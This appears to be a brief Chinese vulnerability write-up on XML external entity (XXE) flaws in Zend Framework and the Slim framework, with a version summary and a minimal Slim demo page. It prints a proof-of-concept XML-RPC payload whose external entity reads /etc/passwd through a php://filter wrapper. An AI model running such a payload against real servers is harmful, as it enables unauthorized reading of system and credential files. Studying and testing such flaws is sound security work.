zend漏洞
zend framework文件读取漏洞分析
Zend Framework 1.11.13、1.12.0之前版本内的(1) Zend_Dom, (2) Zend_Feed, (3) Zend_Soap没有正确处理SimpleXMLElement类,这使得远程攻击者可利用XML-RPC请求中DOCTYPE元素内的外部实体引用(external entity reference)注入攻击,从而读取任意文件或创建TCP连接。
poc:
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ELEMENT methodName ANY >
<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=file:///etc/passswd" >]>
<methodCall>
<methodName>&xxe;</methodName>
</methodCall>
Zend Framework远程执行代码漏洞
poc的链接
Slim 漏洞
Slim XXE漏洞
编写一个最简单的demo页面,只有一个获取POST信息并输出的功能:
<?php require 'vendor/autoload.php'; $app = new \Slim\App(); $app->post("/post", function($request, $response) { $parsedBody = $request->getParsedBody(); print_r($parsedBody); }); $app->run();
搭建在自己的服务器
正常请求
触发XXE漏洞并读取/etc/passwd: